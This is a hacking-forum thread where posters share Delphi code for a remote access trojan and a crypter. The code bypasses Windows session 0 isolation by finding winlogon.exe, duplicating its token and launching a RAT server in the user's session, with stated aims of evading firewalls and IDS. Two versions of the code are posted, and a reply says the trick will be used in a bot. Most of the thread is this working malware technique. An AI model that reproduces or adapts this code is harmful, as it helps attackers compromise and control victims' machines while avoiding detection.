
Thread: Session 0 Isolation Bypass

  1. #1

    Session 0 Isolation Bypass

    Bad news: I dont know how metasploit does it despite perusing their src code at length. I have an inelegant method to do it, gathered from various sources....

    The following code can only be used in injection... (source code is in delphi since Im trying to add it to OpenShades, but it should translate easily to C++)

    Code:
    //breaking session 0 isolation
    // Win32 imports bound directly through Delphi `external` declarations (stdcall).
    // Session id of the physically attached console session.
    function WTSGetActiveConsoleSessionId:DWORD;stdcall; external 'Kernel32.dll';
    // Called below, but the token it returns (hUserToken) is never used afterwards.
    function WTSQueryUserToken(SessionID:DWORD;phToken:PDWORD):BOOL; stdcall; external 'wtsapi32.dll' name 'WTSQueryUserToken';
    // Builds an environment block for the given token (passed to the spawned process).
    function CreateEnvironmentBlock(var lpEnvironment: Pointer; hToken: THANDLE; bInherit: Boolean): Boolean; stdcall; external 'userenv.dll';
    // Maps a PID to its session id. The out-parameter is declared as a plain DWORD here;
    // callers pass DWORD(@variable) rather than a typed pointer.
    function ProcessIdToSessionId(dwProcessId: DWORD; pSessionId: DWORD): Boolean; stdcall; external 'Kernel32.dll';
    
    // Returns the PID of the winlogon.exe instance whose session id equals dwSessionId,
    // or 0 when no such process is found or the snapshot cannot be taken.
    // Defender note: enumerating processes to locate winlogon.exe in the console session is
    // the lookup step for the token duplication done in BreakSession0; it is followed by an
    // OpenProcess on winlogon.exe, which process-access telemetry (e.g. Sysmon event 10
    // scoped to winlogon.exe) records. The snapshot handle is not closed before returning.
    function WinlogonSessionFinder( dwSessionId:DWORD ):DWORD;
    var
      winlogonPid,winlogonSessId: DWORD;
      hProcess,hSnap: THANDLE;   // hProcess is declared but not used in this function
      procEntry: TProcessEntry32;
    begin
      Result := 0;
      hSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
      if (hSnap <> INVALID_HANDLE_VALUE) then begin
    
        procEntry.dwSize := sizeof(PROCESSENTRY32);
    
        winlogonPid := 0;
    
        if Process32First(hSnap, procEntry) then begin
    
          // Iteration starts with Process32Next, so the entry filled by Process32First is not inspected.
          while Process32Next(hSnap, procEntry) do
          begin
            // Case-sensitive substring match on the image file name.
            if pos('winlogon.exe', procEntry.szExeFile) > 0 then
            begin
              winlogonSessId := 0;
              // Called twice with the same arguments; only the second call's result is checked.
              ProcessIdToSessionId(procEntry.th32ProcessID, DWORD(@winlogonSessId));
              if ProcessIdToSessionId(procEntry.th32ProcessID, DWORD(@winlogonSessId)) then //
              begin
                // First winlogon.exe in the requested session wins.
                if winlogonSessId = dwSessionId then
                begin
                  winlogonPid := procEntry.th32ProcessID;
                  break;
                end;
              end;
            end;
          end;
          Result := winlogonPid;
        end;
    
      end;
    end;
    
    // Locates winlogon.exe in the active console session, duplicates its primary token and
    // starts testServer.exe under that token inside the console session. Execution leaves
    // session 0 by spawning a new process, not by migrating the caller.
    // Defender note: the observable chain is OpenProcess(winlogon.exe, MAXIMUM_ALLOWED) ->
    // OpenProcessToken -> DuplicateTokenEx -> SetTokenInformation(TokenSessionId) ->
    // CreateProcessAsUser, issued from a session-0 process. Handle-access auditing on
    // winlogon.exe and process-creation auditing (parent in session 0, child in the console
    // session under a duplicated token) cover it. Only OpenProcessToken's result is checked,
    // and none of the process or token handles opened here are closed, so they remain in the
    // caller's handle table afterwards.
    procedure BreakSession0;
    var
      pi: PROCESS_INFORMATION;
      si: STARTUPINFO;
      dwSessionId,winlogonPid,dwCreationFlags,winlogonSessId,fool: DWORD;
      hUserToken,hUserTokenDup,hPToken,hProcess,hSnap: THANDLE;
      tp:TOKEN_PRIVILEGES;
      uid : LUID;
      pEnv: Pointer;
      //wth:PHANDLE;
    
    begin
      // Drop any thread impersonation so the calls below run under the process token.
      RevertToSelf;
      dwSessionId := WtsGetActiveConsoleSessionID;
      winlogonPid := WinlogonSessionFinder(dwSessionId);
      if winlogonPid <> 0 then begin
        // Result is written to hUserToken but never used afterwards.
        WTSQueryUserToken(dwSessionId,@hUserToken);
    //    dwCreationFlags := NORMAL_PRIORITY_CLASS or CREATE_NEW_CONSOLE;
    //    ZeroMemory(@si, sizeof(STARTUPINFO));
    //    si.cb := sizeof(STARTUPINFO);
    //    si.lpDesktop := 'winsta0\default';
    //    ZeroMemory(@pi, sizeof(pi));
        // Opens winlogon.exe with every access right the caller is granted.
        hProcess := OpenProcess(MAXIMUM_ALLOWED,FALSE,winlogonPid);
    
        // $100 is the value of TOKEN_ADJUST_SESSIONID, required for the TokenSessionId change below.
        if OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY
                        or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY or $100
                        or TOKEN_READ or TOKEN_WRITE,hPToken) then
        begin
          // Single-entry privilege set handed to AdjustTokenPrivileges below.
          tp.PrivilegeCount := 1;
          tp.Privileges[0].Luid := INT64(uid);
          tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    
          // Primary-token copy of winlogon's token; this is the token the new process runs under.
          DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,nil,SecurityIdentification,TokenPrimary,hUserTokenDup);
          //Adjust Token privilege
          // Retarget the duplicated token at the console session, then apply the privilege set.
          SetTokenInformation(hUserTokenDup,TokenSessionId,Pointer(dwSessionId),sizeof(DWORD));
          AdjustTokenPrivileges(hUserTokenDup, FALSE, tp, sizeof(TOKEN_PRIVILEGES), nil, fool);
    
          pEnv := nil;
    
          // Environment for the new process is derived from the duplicated token.
          if CreateEnvironmentBlock(pEnv,hUserTokenDup,TRUE) then
            dwCreationFlags := dwCreationFlags or CREATE_UNICODE_ENVIRONMENT;
    
    //// Launch the process in the client's logon session.
    
          // Spawns the target under hUserTokenDup; pi receives the new process/thread handles.
          CreateProcessAsUser(
            hUserTokenDup,            // client's access token
            'C:\Users\<censored>\Desktop\DDAY RAT\OpenShades NET\Server\testServer.exe',              // file to execute
            nil,              // command line
            nil,              // pointer to process SECURITY_ATTRIBUTES
            nil,              // pointer to thread SECURITY_ATTRIBUTES
            FALSE,             // handles are not inheritable
            dwCreationFlags,  // creation flags
            pEnv,              // pointer to new environment block
            nil,              // name of current directory
            si,               // pointer to STARTUPINFO structure
            pi                // receives information about new process
          );
    
        end;
      end;
    end;
    If any1 has a better method to bypass session 0 isolation without needing to create a new process, I'd sure like to see it. RAID would benefit from that as well since u can bypass without having to inject and triggering the firewalls and IDS n shit

  2. #2
    Edit: after desperately trying to put it into my crypter (I have no fuckin clue when it comes to writing polymorphic wrappers of windows apis. Who knew.)
    I have found out that a little over half of the functions in here are unnecessary. Rly u just needed to duplicate the token and then createprocessasuser. Good. Now I get to delete all the polymorphic functions that arent working like wtsqueryusertoken or someshit. Haha thats wat I get for c/p w/o experimenting huh?


    Code:
    //breaking session 0 isolation
    // Win32 imports bound directly through Delphi `external` declarations (stdcall).
    // Session id of the physically attached console session.
    function WTSGetActiveConsoleSessionId:DWORD;stdcall; external 'Kernel32.dll';
    // Maps a PID to its session id. The out-parameter is declared as a plain DWORD here;
    // callers pass DWORD(@variable) rather than a typed pointer.
    function ProcessIdToSessionId(dwProcessId: DWORD; pSessionId: DWORD): Boolean; stdcall; external 'Kernel32.dll';
    
    // Returns the PID of the winlogon.exe instance whose session id equals dwSessionId,
    // or 0 when no such process is found or the snapshot cannot be taken.
    // Defender note: enumerating processes to locate winlogon.exe in the console session is
    // the lookup step for the token duplication done in BreakSession0; it is followed by an
    // OpenProcess on winlogon.exe, which process-access telemetry (e.g. Sysmon event 10
    // scoped to winlogon.exe) records. The snapshot handle is not closed before returning.
    function WinlogonSessionFinder( dwSessionId:DWORD ):DWORD;
    var
      winlogonPid,winlogonSessId: DWORD;
      hProcess,hSnap: THANDLE;   // hProcess is declared but not used in this function
      procEntry: TProcessEntry32;
    begin
      Result := 0;
      hSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
      if (hSnap <> INVALID_HANDLE_VALUE) then begin
    
        procEntry.dwSize := sizeof(PROCESSENTRY32);
    
        winlogonPid := 0;
    
        if Process32First(hSnap, procEntry) then begin
    
          // Iteration starts with Process32Next, so the entry filled by Process32First is not inspected.
          while Process32Next(hSnap, procEntry) do
          begin
            // Case-sensitive substring match on the image file name.
            if pos('winlogon.exe', procEntry.szExeFile) > 0 then
            begin
              winlogonSessId := 0;
    
              if ProcessIdToSessionId(procEntry.th32ProcessID, DWORD(@winlogonSessId)) then //
              begin
                // First winlogon.exe in the requested session wins.
                if winlogonSessId = dwSessionId then
                begin
                  winlogonPid := procEntry.th32ProcessID;
                  break;
                end;
              end;
            end;
          end;
          Result := winlogonPid;
        end;
    
      end;
    end;
    
    // Trimmed variant: locates winlogon.exe in the active console session, duplicates its
    // primary token and starts testServer.exe under that token. Compared with the earlier
    // version, WTSQueryUserToken, SetTokenInformation, AdjustTokenPrivileges and
    // CreateEnvironmentBlock are gone; the new process gets a nil environment block.
    // Defender note: the observable chain is OpenProcess(winlogon.exe, MAXIMUM_ALLOWED) ->
    // OpenProcessToken -> DuplicateTokenEx -> CreateProcessAsUser, issued from a session-0
    // process. Handle-access auditing on winlogon.exe and process-creation auditing cover it.
    // Only OpenProcessToken's result is checked, and none of the process or token handles
    // opened here are closed, so they remain in the caller's handle table afterwards.
    procedure BreakSession0;
    var
      pi: PROCESS_INFORMATION;
      si: STARTUPINFO;
      dwSessionId,winlogonPid,dwCreationFlags,winlogonSessId,fool: DWORD;
      hUserToken,hUserTokenDup,hPToken,hProcess,hSnap: THANDLE;
      tp:TOKEN_PRIVILEGES;
      uid : LUID;
      pEnv: Pointer;
      //wth:PHANDLE;
    
    begin
      // Drop any thread impersonation so the calls below run under the process token.
      RevertToSelf;
      dwSessionId := WtsGetActiveConsoleSessionID;
      winlogonPid := WinlogonSessionFinder(dwSessionId);
      if winlogonPid <> 0 then begin
        // Opens winlogon.exe with every access right the caller is granted.
        hProcess := OpenProcess(MAXIMUM_ALLOWED,FALSE,winlogonPid);
    
        // $100 is the value of TOKEN_ADJUST_SESSIONID.
        if OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY
                        or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY or $100
                        or TOKEN_READ or TOKEN_WRITE,hPToken) then
        begin
          // Privilege set is filled in but no longer applied (no AdjustTokenPrivileges call remains).
          tp.PrivilegeCount := 1;
          tp.Privileges[0].Luid := INT64(uid);
          tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    
          // Primary-token copy of winlogon's token; this is the token the new process runs under.
          DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,nil,SecurityIdentification,TokenPrimary,hUserTokenDup);
    
            dwCreationFlags := dwCreationFlags or CREATE_UNICODE_ENVIRONMENT;
    
    //// Launch the process in the client's logon session.
    
          // Spawns the target under hUserTokenDup; pi receives the new process/thread handles.
          CreateProcessAsUser(
            hUserTokenDup,            // client's access token
            'C:\Users\<censored>\Desktop\DDAY RAT\OpenShades NET\Server\testServer.exe',              // file to execute
            nil,              // command line
            nil,              // pointer to process SECURITY_ATTRIBUTES
            nil,              // pointer to thread SECURITY_ATTRIBUTES
            FALSE,             // handles are not inheritable
            dwCreationFlags,  // creation flags
            nil,              // pointer to new environment block
            nil,              // name of current directory
            si,               // pointer to STARTUPINFO structure
            pi                // receives information about new process
          );
    
        end;
      end;
    end;
    Welp back to work... yknow that article didnt exactly teach HOW to write self-modifying windows api wrappers for all cases, like where one function returns a pointer as a variable or someshit.... keep getting access violation at address 0000000000 its some whack shit I tell ya. Fuck! At this rate Imma need to retake ECE 3035 or somethin
    Last edited by Mr Virut; 23-01-2012 at 22:13.

  3. #3
    just found nice trick that can be done with this method

    good share, very interesting and useful

  4. #4
    Just curious, what nice trick did u find?

  5. #5
    Quote Originally Posted by Mr Virut View Post
    Just curious, what nice trick did u find?
    would be nice to share, but i rather keep it secret...

    i don't want anyone identifying me as the coder of my bot when they see an exe in the wild using the trick, so i cant say, but again thanks for the code, its very useful
